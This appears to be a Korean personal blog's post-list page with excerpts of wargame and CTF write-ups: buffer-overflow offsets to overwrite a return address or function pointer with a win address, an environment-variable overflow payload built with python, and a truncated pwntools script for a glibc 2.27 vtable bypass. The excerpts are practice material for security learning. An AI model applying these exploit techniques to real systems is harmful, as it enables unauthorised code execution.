목록분류 전체보기 (365)
ret을 win주소로 덮는다. buffer 64byte에 sfp 8byte를 더한 곳이 ret의 위치이다.
gets함수를 이용해 bof를 일으킨다. fp의 주소를 win주소로 바꿔주도록 한다. fp : rbp-0x8 buffer : rbp-0x50 0x50 - 0x8 = dec(72) win 주소 : 0x401142 성공
사진 화질이 구리게 나왔다. 환경 변수를 통한 공격 문제이다. 0x50 - 0xc = dec(68) export GREENIE=$(python -c 'print "a"*68 + “\x0d\x0a + ”\x0d\x0a“') 로 환경변수 설정을 해주었다. 값이 잘들어갔다.
내가 쓰던 라이브러리 파일이다. glibc 2.27로 전혀 문제가 없는듯 했다. #vtable_bypass.py from pwn import * p = process("./vtable_bypass") libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') elf = ELF('./vtable_bypass') print p.recvuntil("stdout: ") leak = int(p.recvuntil("\n").strip("\n"),16) libc_base = leak - libc.symbols['_IO_2_1_stdout_'] io_file_jumps = libc_base + libc.symbols['_IO_file_jumps'] io_str_overflow = io_file_..
보호되어 있는 글입니다.
https://dreamhack.io/wargame/challenges/9/
보호되어 있는 글입니다.
보호되어 있는 글입니다.